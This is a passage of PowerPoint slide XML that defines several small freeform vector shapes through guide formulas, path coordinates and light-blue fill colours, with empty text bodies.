              <a:gd name="T28" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 57"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 0 h 57"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T39" fmla="*/ 0 h 57"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T41" fmla="*/ 0 h 57"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T43" fmla="*/ 0 h 57"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T45" fmla="*/ 0 h 57"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T47" fmla="*/ 0 h 57"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T49" fmla="*/ 0 h 57"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 57"/>
              <a:gd name="T80" fmla="*/ 12 w 12"/>
              <a:gd name="T81" fmla="*/ 57 h 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 h="57">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10395" name="Freeform 476"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="6243638"/>
            <a:ext cx="22225" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 0 w 10"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 0 w 10"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T43" fmla="*/ 0 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T45" fmla="*/ 0 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 45"/>
              <a:gd name="T80" fmla="*/ 10 w 10"/>
              <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10396" name="Freeform 477"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1516062" y="6257925"/>
            <a:ext cx="15875" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T6" fmla="*/ 0 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T8" fmla="*/ 0 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T10" fmla="*/ 0 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T12" fmla="*/ 0 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T14" fmla="*/ 0 w 7"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T39" fmla="*/ 0 h 34"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T41" fmla="*/ 0 h 34"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T43" fmla="*/ 0 h 34"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T45" fmla="*/ 0 h 34"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T47" fmla="*/ 0 h 34"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T49" fmla="*/ 0 h 34"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 3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34"/>
              <a:gd name="T80" fmla="*/ 7 w 7"/>
              <a:gd name="T81" fmla="*/ 34 h 3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34">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10397" name="Freeform 478"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1730375" y="6183313"/>
            <a:ext cx="53975" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 0 w 24"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 0 w 24"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T35" fmla="*/ 0 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 9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91"/>
              <a:gd name="T59" fmla="*/ 24 w 24"/>
              <a:gd name="T60" fmla="*/ 91 h 9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91">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10398" name="Freeform 479"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733550" y="6199188"/>
            <a:ext cx="42862" cy="174625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 0 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 0 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 0 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 0 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 7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77"/>
              <a:gd name="T59" fmla="*/ 19 w 19"/>
              <a:gd name="T60" fmla="*/ 77 h 7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77">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10399" name="Freeform 480"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="6213475"/>
            <a:ext cx="34925" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T1" fmla="*/ 0 h 64"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T24" fmla="*/ 0 w 15"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T26" fmla="*/ 0 w 15"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T28" fmla="*/ 0 w 15"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T30" fmla="*/ 0 w 15"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 64"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T35" fmla="*/ 0 h 64"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T37" fmla="*/ 0 h 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64"/>
              <a:gd name="T59" fmla="*/ 15 w 15"/>
              <a:gd name="T60" fmla="*/ 64 h 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64">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
